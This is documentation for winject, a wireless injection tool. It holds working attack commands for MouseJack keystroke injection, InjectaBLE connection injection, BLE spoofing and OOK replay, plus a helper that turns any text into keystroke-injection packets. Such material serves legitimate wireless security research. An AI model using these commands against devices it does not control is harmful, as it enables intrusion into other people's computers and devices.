winject: generic injection tool
================================

``winject`` is a convenient tool to inject arbitrary data using various wireless protocols or wireless modulations. It supports any domain natively supported by WHAD and is able to inject arbitrary data in various formats:

- PHY (raw modulation)
- Bluetooth Low Energy
- IEEE 802.15.4
- Nordic Semiconductor's *Enhanced ShockBurst* (ESB)
- Logitech's Unifying protocol

Moreover, ``winject`` can be chained with other tools like ``wsniff`` or ``wplay`` to allow more complex data processing.

Usage
-----

.. code-block:: text

    winject [OPTIONS] DOMAIN [DOMAIN OPTIONS] [PACKETS]

Global options (``-i``, ``-r``, ``-d``) are given before the domain name, domain-specific options after it. A short option reused by a domain is therefore not ambiguous: ``-d`` before the domain name is the inter-packet delay, ``-d`` after ``phy`` is the data rate.

Command-line options
^^^^^^^^^^^^^^^^^^^^

**winject** supports the following options:

* ``--interface`` (``-i``): specifies the WHAD interface to use to connect to the target device
* ``--repeat`` (``-r``): repeat the transmission of packets
* ``--delay DELAY`` (``-d DELAY``): delay between the transmission of two consecutive packets

.. include:: debug-options.rst

Specific PHY options
^^^^^^^^^^^^^^^^^^^^

* ``--frequency`` (``-f``): specifies the target frequency in Hz. This frequency must be in the device's supported frequency range.
* ``--little-endian`` (``-le``): interpret bytes as little-endian (LSB first; the default is *big-endian*).
* ``--datarate`` (``-d``): set the data rate in bits per second (*bps*).
* ``--packet-size`` (``-s``): set the maximum packet (or reception buffer) size in bytes.
* ``--sync-word`` (``-w``): set a synchronization word (hex value expected)
* ``--ask`` (``-ask``): select ASK (Amplitude Shift Keying) modulation
* ``--gfsk`` (``-gfsk``): select GFSK (Gaussian Frequency Shift Keying) modulation
* ``--bfsk`` (``-bfsk``): select BFSK (Binary Frequency Shift Keying) modulation
* ``--qfsk`` (``-qfsk``): select QFSK (Quaternary Frequency Shift Keying) modulation
* ``--bpsk`` (``-bpsk``): select BPSK (Binary Phase Shift Keying) modulation
* ``--qpsk`` (``-qpsk``): select QPSK (Quadrature Phase Shift Keying) modulation
* ``--lora`` (``-lora``): select LoRa (Semtech Long Range) modulation

Specific FSK options
^^^^^^^^^^^^^^^^^^^^

* ``--deviation`` (``-dev``): frequency deviation in Hz

Specific LoRa options
^^^^^^^^^^^^^^^^^^^^^

* ``--spreading-factor`` (``-sf``): set LoRa spreading factor
* ``--coding-rate`` (``-cr``): set LoRa coding rate

  - ``44`` for 4/4
  - ``45`` for 4/5
  - ``46`` for 4/6
  - ``47`` for 4/7
  - ``48`` for 4/8

* ``--bandwidth`` (``-bw``): set LoRa bandwidth in Hz
* ``--enable-crc`` (``-crc``): enable LoRa CRC
* ``--enable-explicit_mode`` (``-em``): enable explicit mode

Specific BLE options
^^^^^^^^^^^^^^^^^^^^

* ``--raw``: inject a packet directly on a channel, without synchronizing with a connection
* ``--inject-to-slave``: inject a packet to the slave (Peripheral) of a synchronized connection
* ``--inject-to-master``: inject a packet to the master (Central) of a synchronized connection
* ``--synchronize`` (``-s``): synchronize with a connection before injection
* ``--access-address`` (``-aa``): set the access address of the connection to target
* ``--crc-init`` (``-crc``): set the CRC initial value of the target connection
* ``--hop-interval`` (``-int``): set the hop interval of the target connection
* ``--hop-increment`` (``-inc``): set the hop increment of the target connection (CSA #1 only)
* ``--channel-map`` (``-chm``): set the channel map of the target connection
* ``--channel`` (``-c``): select the channel to use for injection
* ``--filter`` (``-m``): only synchronize with a connection involving the provided BD address

Specific ESB options
^^^^^^^^^^^^^^^^^^^^

* ``--channel`` (``-c``): select a channel (0-100) to use for injection
* ``--address`` (``-f``): set a device address to use
* ``--scanning`` (``-s``): scan channels before injecting ESB packets

Specific Logitech Unifying options
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

* ``--channel`` (``-c``): select a channel (0-100) to use for injection
* ``--address`` (``-f``): set a device address to use
* ``--scanning`` (``-s``): scan channels before injecting Unifying packets

Specific 802.15.4 options
^^^^^^^^^^^^^^^^^^^^^^^^^^

* ``--channel`` (``-c``): select a channel (11-26) to use for injection

Specific ZigBee options
^^^^^^^^^^^^^^^^^^^^^^^^^^

* ``--channel`` (``-c``): select a channel (11-26) to use for injection

Specific RF4CE options
^^^^^^^^^^^^^^^^^^^^^^^

* ``--channel`` (``-c``): select a channel (11-26) to use for injection

Injecting scapy packets
^^^^^^^^^^^^^^^^^^^^^^^^

``winject`` can use a WHAD-compatible device to inject arbitrary scapy packets. Provide the configuration of a specific domain, then append a list of scapy packets, one quoted Python expression per packet. For example, the following command builds and injects a Logitech Unifying mouse packet on channel 62, using address ``ca:e9:06:ec:a4``:

.. code-block:: text

    winject -i uart0 unifying -c 62 -f ca:e9:06:ec:a4 \
        "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Mouse_Payload(button_mask=0x02)"

Injected on the right channel with the right address, this packet should trigger a right click on the computer the Unifying dongle is connected to.

You can also provide multiple packets:

.. code-block:: text

    winject -i uart0 unifying -c 71 -f ca:e9:06:ec:a4 \
        "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('001400000000000000'))" \
        "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('000000000000000000'))"

If successful, this injection produces an 'A' key press followed by a key release on the computer the Unifying dongle is connected to.

Injecting raw buffers
^^^^^^^^^^^^^^^^^^^^^^

``winject`` can also inject arbitrary raw buffers, if the packets are provided as hex-encoded bytestrings. For example, the following command injects an OOK-modulated packet with a Yard Stick One at 433.92 MHz, with a data rate of 10000 bauds:

.. code-block:: text

    winject -i yardstickone0 phy -f 433920000 -d 10000 --ask \
        fff03e0003fff81fffc1f0000f80007fff07e0003e0001f0000f8000ff

Injecting from a PCAP file
^^^^^^^^^^^^^^^^^^^^^^^^^^^

``winject`` can use the output of another tool, such as ``wplay`` (which replays an existing PCAP file), as a source of traffic to inject. This makes it easy to implement a replay attack using only command line tools. For example, let's implement a basic Logitech Unifying replay attack. Start by capturing some mouse packets from a Logitech Unifying mouse and dump them into a PCAP file:

.. code-block:: text

    wsniff -i uart0 unifying -s -f ca:e9:06:ec:a4 | wdump /tmp/mouse.pcap

Once packets have been captured, replay them from the PCAP file and inject them with the following command:

.. code-block:: text

    wplay /tmp/mouse.pcap | winject -i uart0 -s -f ca:e9:06:ec:a4

.. warning::

    In the previous example, the domain (``unifying``) is given neither to ``winject`` nor to ``wplay``. This relies on the fact that, by default, every PCAP captured by WHAD has its header patched to remember the corresponding domain.
    While this feature is convenient, any unpatched PCAP file (for example, one captured with another tool) requires the domain to be given explicitly after the PCAP filename. You can also force the interpretation of the traffic as a specific domain by providing the domain explicitly to ``winject``.

Bluetooth Low Energy injection
-------------------------------

``winject`` provides specific features for injecting Bluetooth Low Energy packets:

* injecting raw packets directly on a specific channel (can be used to replay advertisements)
* injecting packets to the Peripheral (Slave) of an existing connection, using the InjectaBLE attack
* injecting packets to the Central (Master) of an existing connection, using the InjectaBLE attack

Injecting raw advertisements
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

``winject`` provides the ``--raw`` option, which injects a packet directly on a given channel. This can be used to inject BLE advertisements. The buffer is given as it appears on air: the advertising access address (``d6be898e``), the two-byte PDU header, the payload and the three-byte CRC. In this example, we transmit a BLE advertisement repeatedly, every 0.05 s, on channel 37:

.. code-block:: text

    $ winject -r -d 0.05 -i uart0 ble --raw -c 37 d6be898e022228537703d0d01bff75004204018060d0d003775328d2d0037753270100000000000005da96
    [!] Transmitting:

Replaying advertisements from a PCAP file
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

You can also clone advertisements extracted from a PCAP file. Start by sniffing some BLE advertisements with ``wsniff`` while capturing them into a PCAP file:

.. code-block:: text

    $ wsniff -o /tmp/advertisements.pcap -i uart0 ble -a
    [ raw=True, decrypted=False, timestamp=316370100, channel=37, rssi=-74, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ]
    [ raw=True, decrypted=False, timestamp=316375426, channel=37, rssi=-83, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ]
    [ raw=True, decrypted=False, timestamp=316402700, channel=37, rssi=-85, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ]
    [ raw=True, decrypted=False, timestamp=316417881, channel=37, rssi=-70, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ]
    [...]

Let's replay the device with BD address ``11:75:58:2a:f3:28``, named ``TimeBox-Evo-audio``. We build a pipeline of commands performing the following actions:

* ``wplay /tmp/advertisements.pcap``: replay the content of the PCAP file ``/tmp/advertisements.pcap``
* ``wfilter "p.AdvA == '11:75:58:2a:f3:28'"``: apply a filter to keep only traffic from the target device
* ``-t "p.AdvA='11:22:33:44:55:66'"``: apply a transformation to the filtered packets to replace the BD address by ``11:22:33:44:55:66``
* ``winject -r -d 0.01 -i uart0 --raw -c 37``: inject the raw packets directly and repeatedly, every 0.01 s, on channel 37

The final command is:

.. code-block:: text

    $ wplay /tmp/advertisements.pcap | \
        wfilter "p.AdvA == '11:75:58:2a:f3:28'" -t "p.AdvA='11:22:33:44:55:66'" | \
        winject -r -d 0.01 -i uart0 --raw -c 37
    [!] Transmitting: [ raw=True, decrypted=False, timestamp=7366, channel=37, rssi=-74, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ]
    [!] Transmitting: [ raw=True, decrypted=False, timestamp=31491, channel=37, rssi=-74, direction=0, connection_handle=0, is_crc_valid=True, relative_timestamp=0 ]
    [...]
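Before handing a buffer to ``--raw``, whether hand-crafted as in the raw advertisement example above or rewritten with ``wfilter -t``, it is worth checking what it actually encodes. The decoder below is an added example written for this page, not part of WHAD or ``winject``: it splits the buffer into the advertising access address (``d6be898e``, i.e. 0x8E89BED6 sent LSB first), the PDU header, the payload (AdvA followed by AD structures) and the three-byte CRC trailer, which it only splits off and does not verify. Function names and the PDU type table are ours; the type table is the standard BLE 4.x advertising PDU list. Run on the buffer from the example above, it reports an ``ADV_NONCONN_IND`` from public address ``d0:d0:03:77:53:28`` carrying a single manufacturer-specific AD structure with company ID ``0x0075``.

```python
"""Decode a raw BLE advertising-channel buffer as given to `winject ble --raw`.

Added example for this page, not WHAD code. The buffer is taken as it appears on
air: access address, 2-byte PDU header, payload, 3-byte CRC (split off, not checked).
"""
from typing import Dict, List, Tuple

# Advertising-channel access address 0x8E89BED6, transmitted least-significant byte first.
ADV_ACCESS_ADDRESS = bytes.fromhex("d6be898e")

PDU_TYPES = {0: "ADV_IND", 1: "ADV_DIRECT_IND", 2: "ADV_NONCONN_IND", 3: "SCAN_REQ",
             4: "SCAN_RSP", 5: "CONNECT_IND", 6: "ADV_SCAN_IND"}
# PDU types whose payload is AdvA followed by AD structures.
ADVA_ADVDATA_TYPES = {0, 2, 4, 6}


def bdaddr(raw: bytes) -> str:
    """Addresses are sent LSB first; print them MSB first, as wble-central does."""
    return ":".join(f"{b:02x}" for b in reversed(raw))


def parse_ad_structures(data: bytes) -> List[Tuple[int, bytes]]:
    """Split AdvData into (AD type, AD data) pairs; a zero length ends the list."""
    out, i = [], 0
    while i < len(data):
        length = data[i]
        if length == 0:
            break
        if i + 1 + length > len(data):
            raise ValueError(f"AD structure at offset {i} overruns AdvData")
        out.append((data[i + 1], bytes(data[i + 2:i + 1 + length])))
        i += 1 + length
    return out


def decode_raw_adv(hexbuf: str) -> Dict:
    """Decode an advertising-channel PDU given as hex, CRC trailer included."""
    raw = bytes.fromhex(hexbuf)
    if raw[:4] != ADV_ACCESS_ADDRESS:
        raise ValueError("not an advertising-channel PDU (unexpected access address)")
    header, length = raw[4], raw[5]
    payload, crc = raw[6:6 + length], raw[6 + length:]
    if len(payload) != length or len(crc) != 3:
        raise ValueError("length field does not match buffer (payload + 3-byte CRC expected)")
    pdu_type = header & 0x0F
    info = {
        "pdu_type": PDU_TYPES.get(pdu_type, f"reserved({pdu_type})"),
        "tx_add": "random" if header & 0x40 else "public",  # TxAdd bit
        "length": length,
        "crc": crc.hex(),
    }
    if pdu_type in ADVA_ADVDATA_TYPES:
        info["adv_a"] = bdaddr(payload[:6])
        info["ad"] = parse_ad_structures(payload[6:])
        for ad_type, ad_data in info["ad"]:
            if ad_type == 0xFF and len(ad_data) >= 2:   # manufacturer specific data
                info["company_id"] = int.from_bytes(ad_data[:2], "little")
            elif ad_type in (0x08, 0x09):               # shortened / complete local name
                info["name"] = ad_data.decode("utf-8", "replace")
    return info


if __name__ == "__main__":
    # Buffer from the raw advertisement example on this page.
    print(decode_raw_adv("d6be898e022228537703d0d01bff75004204018060d0d003775328d2d0037753270100000000000005da96"))
```

When cloning advertisements, decode the packet you are about to transmit and confirm that ``adv_a`` is the address you expect; an AdvA rewrite that did not apply is otherwise only visible once another interface scans for the spoofed device.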
If we perform a BLE scan using another interface, we can observe our spoofed device in the output:

.. code-block:: text

    $ wble-central -i hci0 scan
    RSSI Lvl   Type   BD Address          Extra info
    [ -75 dBm] [RND]  62:94:29:b5:71:2d
    [ -90 dBm] [RND]  5d:c1:f0:56:b7:0a
    [ -77 dBm] [RND]  df:de:71:72:db:74   name:"Expert_DFDE7172DB74"
    [ -85 dBm] [RND]  7b:b9:d0:d3:6e:ea   name:"LE_WF-C500"
    [ -91 dBm] [RND]  5d:e8:88:36:fe:6d
    [ -43 dBm] [PUB]  11:22:33:44:55:66   name:"TimeBox-Evo-audio"

Injecting packets into an established connection
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Some devices (mainly ButteRFly) allow BLE packet injection into an established connection, using the InjectaBLE attack. Before injecting, you must synchronize with the connection (``--synchronize`` / ``-s``): ``winject`` then waits for a new connection to be established and synchronizes with it before performing the injection, so the target has to (re)connect after ``winject`` is started. If needed, you can restrict synchronization to a specific BD address with the ``--filter`` / ``-m`` option.

To inject a BLE packet to the Peripheral (Slave), use the ``--inject-to-slave`` option:

.. code-block:: text

    winject -i uart0 ble -s -m 11:22:33:44:55:66 --inject-to-slave "BTLE()/BTLE_DATA()/L2CAP_Hdr()/ATT_Hdr()/ATT_Read_Request(gatt_handle=0x21)"

To inject a BLE packet to the Central (Master), use the ``--inject-to-master`` option:

.. code-block:: text

    winject -i uart0 ble -s -m 11:22:33:44:55:66 --inject-to-master "BTLE()/BTLE_DATA()/L2CAP_Hdr()/ATT_Hdr()/ATT_Handle_Value_Notification(gatt_handle=0x21, value=b'\x41\x42\x43')"

802.15.4, ZigBee & RF4CE Injection
------------------------------------

``winject`` allows to easily inject 802.15.4 packets. A raw ``dot15d4`` buffer is the MAC frame followed by its two-byte FCS. The following command injects a packet using the 802.15.4 domain (``dot15d4``):
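Before injecting a raw 802.15.4 buffer such as the one in the command that follows, it is worth parsing its MAC header and recomputing the FCS over everything but the last two bytes: the ``wsniff`` check further down reports ``is_fcs_valid=False`` for that frame, and this is the quickest way to tell whether the trailer in the buffer is the cause. The checker below is an added example written for this page, not WHAD code. It implements the standard 802.15.4 FCS (CRC-16, polynomial x^16 + x^12 + x^5 + 1, initial value 0, bit-reflected, i.e. CRC-16/KERMIT) and assumes the FCS is appended least-significant byte first; function names are ours. ``with_fcs`` rebuilds a valid trailer for a frame body if the one you have is wrong.

```python
"""Sanity-check a raw IEEE 802.15.4 frame before `winject dot15d4` injects it.

Added example for this page, not WHAD code. The buffer is assumed to be the MAC
frame followed by its 2-byte FCS, least-significant byte first.
"""
from typing import Dict

FRAME_TYPES = {0: "beacon", 1: "data", 2: "ack", 3: "command"}


def dot15d4_fcs(mpdu: bytes) -> int:
    """802.15.4 FCS: CRC-16, polynomial x^16+x^12+x^5+1, init 0, bit-reflected (CRC-16/KERMIT)."""
    crc = 0
    for byte in mpdu:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc


def parse_mac_header(frame: bytes) -> Dict:
    """Decode the frame control field, sequence number and addressing fields."""
    fcf = int.from_bytes(frame[:2], "little")
    dst_mode, src_mode = (fcf >> 10) & 3, (fcf >> 14) & 3
    hdr = {
        "frame_type": FRAME_TYPES.get(fcf & 7, f"reserved({fcf & 7})"),
        "security": bool(fcf & 0x08),
        "ack_request": bool(fcf & 0x20),
        "pan_id_compression": bool(fcf & 0x40),
        "seq": frame[2],
    }
    i = 3

    def read(n: int) -> int:
        nonlocal i
        value = int.from_bytes(frame[i:i + n], "little")
        i += n
        return value

    if dst_mode:
        hdr["dst_pan"] = read(2)
        hdr["dst_addr"] = read(2 if dst_mode == 2 else 8)   # short or extended address
    if src_mode:
        if not (dst_mode and hdr["pan_id_compression"]):
            hdr["src_pan"] = read(2)
        hdr["src_addr"] = read(2 if src_mode == 2 else 8)
    hdr["header_len"] = i
    return hdr


def check_frame(hexbuf: str) -> Dict:
    """Parse the header and compare the buffer's trailing FCS with one computed over the rest."""
    frame = bytes.fromhex(hexbuf)
    body, trailer = frame[:-2], frame[-2:]
    info = parse_mac_header(body)
    info["fcs_in_buffer"] = int.from_bytes(trailer, "little")
    info["fcs_computed"] = dot15d4_fcs(body)
    info["fcs_valid"] = info["fcs_in_buffer"] == info["fcs_computed"]
    return info


def with_fcs(hexbuf_without_fcs: str) -> str:
    """Append a freshly computed FCS (LSB first) to a frame body."""
    body = bytes.fromhex(hexbuf_without_fcs)
    return (body + dot15d4_fcs(body).to_bytes(2, "little")).hex()


if __name__ == "__main__":
    # Frame from the dot15d4 injection example on this page.
    print(check_frame("008021f4ec1700ff0f000000228ce33a7768bac3a278ffffff00f4f1"))
```

The page's buffer parses as a beacon frame (sequence number 0x21) from short address 0x0017 on PAN 0xecf4; whether its trailer is a valid FCS depends on whether your injecting interface expects the FCS inside the buffer or appends its own, so compare ``fcs_in_buffer`` with ``fcs_computed`` before trusting the sniffer's verdict.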
.. code-block:: text

    $ winject -i uart0 dot15d4 -c 11 008021f4ec1700ff0f000000228ce33a7768bac3a278ffffff00f4f1
    [!] Transmitting:

You can check that the packet is correctly transmitted using ``wsniff`` on another interface:

.. code-block:: text

    $ wsniff -i uart1 zigbee -c 11
    [ decrypted=False, timestamp=3543855, channel=11, rssi=-54, is_fcs_valid=False, lqi=156 ]

Note that the sniffer reports ``is_fcs_valid=False`` for this frame: before relying on the FCS of captured frames as a transmission check, verify whether your injecting interface expects the FCS to be included at the end of the buffer or appends its own.

Similarly, you can transmit ZigBee or RF4CE packets using respectively ``zigbee`` or ``rf4ce`` instead of ``dot15d4``.

ESB and Unifying Injection
---------------------------

``winject`` allows to easily inject ESB or Logitech Unifying packets.

Injecting a single Unifying packet
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

For example, the following command builds and injects a Logitech Unifying mouse packet on channel 62, using address ``ca:e9:06:ec:a4``:

.. code-block:: text

    winject -i uart0 unifying -c 62 -f ca:e9:06:ec:a4 \
        "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Mouse_Payload(button_mask=0x02)"

Injected on the right channel with the right address, this packet should trigger a right click on the computer the Unifying dongle is connected to.

Injecting multiple Unifying packets
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

You can also provide multiple packets:

.. code-block:: text

    winject -i uart0 unifying -c 71 -f ca:e9:06:ec:a4 \
        "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('001400000000000000'))" \
        "ESB_Hdr(address='ca:e9:06:ec:a4')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('000000000000000000'))"

If successful, this injection produces an 'A' key press followed by a key release on the computer the Unifying dongle is connected to, leveraging MouseJack unencrypted keystroke injection. The host interprets the HID usage ID according to its own keyboard layout: usage ``0x14`` is the key labelled A on an AZERTY keyboard and Q on a QWERTY one, so adapt the payload to the target's layout.
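The keystroke packets above are written by hand. The helper below, an added example written for this page and not part of WHAD, generates the press/release pairs for a whole string and the matching ``winject`` command line, so the same technique can be applied beyond a single key. It reuses the 9-byte ``hid_data`` layout of the page's example (modifier byte, one HID usage ID, zero padding) and a small USB HID usage table, and accounts for the host keyboard layout for the letters that differ between QWERTY and AZERTY, which is why the page's usage ``0x14`` types an A on an AZERTY host. The usage table, the AZERTY handling (letters only) and the function names are ours.

```python
"""Generate Logitech Unifying unencrypted-keystroke packets for winject from a string.

Added example for this page, not WHAD code. The 9-byte hid_data layout (modifier,
one usage ID, zero padding) is taken from the page's keystroke example.
"""
from typing import List

# USB HID keyboard usage IDs as interpreted by a QWERTY (US) host.
HID_USAGE = {c: 0x04 + i for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
HID_USAGE.update({d: 0x1E + i for i, d in enumerate("1234567890")})
HID_USAGE.update({"\n": 0x28, " ": 0x2C, "-": 0x2D, ".": 0x37})

# On a French AZERTY host the same usage IDs print different letters, so to type a
# letter we send the usage of the key sitting at that physical position.
# Assumption: only the letters that move (a/q, z/w, m) are handled; digits and
# punctuation need Shift/AltGr on AZERTY and are rejected.
AZERTY_USAGE = {"a": 0x14, "q": 0x04, "z": 0x1A, "w": 0x1D, "m": 0x33}
LEFT_SHIFT = 0x02  # modifier bit

PACKET = ("ESB_Hdr(address='{addr}')/ESB_Payload_Hdr()/Logitech_Unifying_Hdr()/"
          "Logitech_Unencrypted_Keystroke_Payload(hid_data=bytes.fromhex('{hid}'))")


def usage_id(char: str, layout: str = "qwerty") -> int:
    """Usage ID of the key that produces `char` (case-insensitive) on the host layout."""
    key = char.lower()
    if layout == "azerty":
        if key in AZERTY_USAGE:
            return AZERTY_USAGE[key]
        if not (key.isalpha() or key in (" ", "\n")):
            raise ValueError(f"{char!r} needs Shift/AltGr on AZERTY; not handled here")
    elif layout != "qwerty":
        raise ValueError(f"unknown layout {layout!r}")
    if key not in HID_USAGE:
        raise ValueError(f"no usage ID for {char!r} in this table")
    return HID_USAGE[key]


def hid_report(char: str = "", layout: str = "qwerty") -> bytes:
    """9-byte hid_data: modifier, first key, padding. An empty char is a key release."""
    if char == "":
        return bytes(9)
    modifier = LEFT_SHIFT if char.isupper() else 0
    return bytes([modifier, usage_id(char, layout)]) + bytes(7)


def keystroke_packets(text: str, address: str, layout: str = "qwerty") -> List[str]:
    """One press packet and one release packet per character, as winject packet strings."""
    packets = []
    for ch in text:
        packets.append(PACKET.format(addr=address, hid=hid_report(ch, layout).hex()))
        packets.append(PACKET.format(addr=address, hid=hid_report().hex()))
    return packets


def winject_command(text: str, address: str, channel: int,
                    interface: str = "uart0", layout: str = "qwerty") -> str:
    """Full command line, one quoted packet expression per argument."""
    args = " ".join(f'"{p}"' for p in keystroke_packets(text, address, layout))
    return f"winject -i {interface} unifying -c {channel} -f {address} {args}"


if __name__ == "__main__":
    # Reproduces the page's example: the key that prints A on an AZERTY host, then a release.
    print(winject_command("a", "ca:e9:06:ec:a4", 71, layout="azerty"))
```

Every press is followed by an explicit release packet; without it the dongle keeps the key held down and the host auto-repeats it.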
Replaying a sniffed Unifying communication
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Start by capturing some mouse packets from a Logitech Unifying mouse while moving the mouse, and dump them into a PCAP file:

.. code-block:: text

    wsniff -i uart0 unifying -s -f ca:e9:06:ec:a4 | wdump /tmp/mouse.pcap

Once the packets have been captured, replay them from the PCAP file and inject them with the following command:

.. code-block:: text

    wplay /tmp/mouse.pcap | winject -i uart0 -s -f ca:e9:06:ec:a4

If everything works properly, you should see the captured mouse movement reproduced on your screen.

Injecting a raw ESB packet
^^^^^^^^^^^^^^^^^^^^^^^^^^^

You can inject raw packets directly. For example, the following command injects a raw ESB Ping Request for device ``11:22:33:44:55`` on channel 15:

.. code-block:: text

    $ winject -i uart0 esb -c 15 -f 11:22:33:44:55 "ESB_Hdr(address='11:22:33:44:55')/ESB_Payload_Hdr()/ESB_Ping_Request()"
    [!] Transmitting:

You can check that the packet has been correctly transmitted using ``wsniff`` on another device:

.. code-block:: text

    $ wsniff -i uart1 esb -c 15 -f 11:22:33:44:55
    [ raw=True, decrypted=False, timestamp=3803020, channel=15, rssi=-17, is_crc_valid=True, address=11:22:33:44:55 ]

Injecting arbitrary modulated data
------------------------------------

Using the ``phy`` domain, it is possible to inject arbitrary data with a dedicated modulation.

Injecting arbitrary data
^^^^^^^^^^^^^^^^^^^^^^^^^

For example, you can inject an OOK-modulated packet using a Yard Stick One at 433.92 MHz, with a data rate of 10000 bauds:

.. code-block:: text

    winject -i yardstickone0 phy -f 433920000 -d 10000 --ask \
        fff03e0003fff81fffc1f0000f80007fff07e0003e0001f0000f8000ff

Replaying an On-Off-Keying signal from a wireless doorbell
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Let's consider a simple replay attack, where we sniff the signal that rings a wireless doorbell operating at 433.92 MHz. First, sniff the signal using ``wsniff`` and record it in a PCAP file using ``wdump``:

.. code-block:: text

    $ wsniff -i yardstickone0 phy -f 433920000 -d 10000 --ask | wdump /tmp/doorbell.pcap
    32 packets have been dumped into /tmp/doorbell.pcap
    /!\ sniffer stopped (CTRL-C)

Then replay the PCAP file using ``wplay`` and inject the recorded signal with the same parameters using ``winject``:

.. code-block:: text

    $ wplay /tmp/doorbell.pcap | winject -i yardstickone0
    [!] Transmitting: [ raw=False, timestamp=96113, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ]
    [!] Transmitting: [ raw=False, timestamp=112135, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ]
    [!] Transmitting: [ raw=False, timestamp=128180, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ]
    [!] Transmitting: [ raw=False, timestamp=144230, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ]
    [!] Transmitting: [ raw=False, timestamp=160268, rssi=0, frequency=433919677, iq=[], endianness=BIG, deviation=16113, datarate=10002, modulation=ASK, syncword= ]

Note that no PHY parameters are passed to ``winject`` here: the frequency, data rate, modulation and endianness are taken from the metadata recorded in the PCAP, which holds the values actually applied by the device during the capture (``frequency=433919677`` and ``datarate=10002`` rather than the requested 433920000 Hz and 10000 bauds).
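The hex buffer given to ``winject phy --ask`` (in the arbitrary data example and in each replayed doorbell frame) is the on/off pattern of the carrier, one bit per symbol at the configured data rate, packed MSB first unless ``--little-endian`` is used. The helper below is an added example written for this page, not WHAD code: it converts such a buffer into pulse durations and back, which is what you need to craft an OOK frame from timings measured on a logic analyser or recovered from a capture, or to check that a recorded doorbell frame has the timings you expect before replaying it. Function names are ours; the buffer, frequency and data rate in the usage come from the page's example.

```python
"""Convert between the OOK bit buffer given to `winject phy --ask` and pulse timings.

Added example for this page, not WHAD code. Each bit is one symbol of 1/datarate
seconds: 1 = carrier on, 0 = carrier off. Bits are packed MSB first, winject's
default; use lsb_first=True for buffers meant for --little-endian.
"""
from typing import List, Tuple

Pulse = Tuple[int, float]  # (level, duration in microseconds)


def bits_from_hex(hexbuf: str, lsb_first: bool = False) -> List[int]:
    """Unpack a hex buffer into a list of 0/1 symbols in transmission order."""
    order = range(8) if lsb_first else range(7, -1, -1)
    return [(byte >> i) & 1 for byte in bytes.fromhex(hexbuf) for i in order]


def run_lengths(bits: List[int]) -> List[Tuple[int, int]]:
    """Run-length encode a bit list into (level, symbol count) pairs."""
    runs: List[Tuple[int, int]] = []
    for bit in bits:
        if runs and runs[-1][0] == bit:
            runs[-1] = (bit, runs[-1][1] + 1)
        else:
            runs.append((bit, 1))
    return runs


def pulses_from_hex(hexbuf: str, datarate: int, lsb_first: bool = False) -> List[Pulse]:
    """Pulse timings of a buffer transmitted at `datarate` symbols per second."""
    symbol_us = 1_000_000 / datarate
    return [(level, count * symbol_us)
            for level, count in run_lengths(bits_from_hex(hexbuf, lsb_first))]


def hex_from_pulses(pulses: List[Pulse], datarate: int, lsb_first: bool = False) -> str:
    """Quantize pulses to whole symbols and pack them; pads the last byte with carrier-off bits."""
    symbol_us = 1_000_000 / datarate
    bits: List[int] = []
    for level, duration_us in pulses:
        count = round(duration_us / symbol_us)
        if count == 0:
            raise ValueError(f"{duration_us} us is shorter than one symbol ({symbol_us} us)")
        bits.extend([level] * count)
    bits.extend([0] * (-len(bits) % 8))
    out = bytearray()
    for i in range(0, len(bits), 8):
        chunk = bits[i:i + 8]
        if lsb_first:
            chunk = chunk[::-1]
        out.append(int("".join(map(str, chunk)), 2))
    return out.hex()


def ook_command(pulses: List[Pulse], frequency: int, datarate: int,
                interface: str = "yardstickone0") -> str:
    """winject command line transmitting the given pulses as an ASK/OOK frame."""
    return (f"winject -i {interface} phy -f {frequency} -d {datarate} --ask "
            f"{hex_from_pulses(pulses, datarate)}")


if __name__ == "__main__":
    # Buffer from the page's Yard Stick One example: 10 kbaud, so one symbol is 100 us.
    frame = "fff03e0003fff81fffc1f0000f80007fff07e0003e0001f0000f8000ff"
    for level, duration in pulses_from_hex(frame, 10000):
        print(f"{'on ' if level else 'off'} {duration:7.1f} us")
    print(ook_command(pulses_from_hex(frame, 10000), 433920000, 10000))
```

Pick the data rate so that the shortest pulse of the remote is a small whole number of symbols; a rate that is too low rounds short pulses away (``hex_from_pulses`` refuses a pulse shorter than one symbol), while a needlessly high rate only makes the buffer longer.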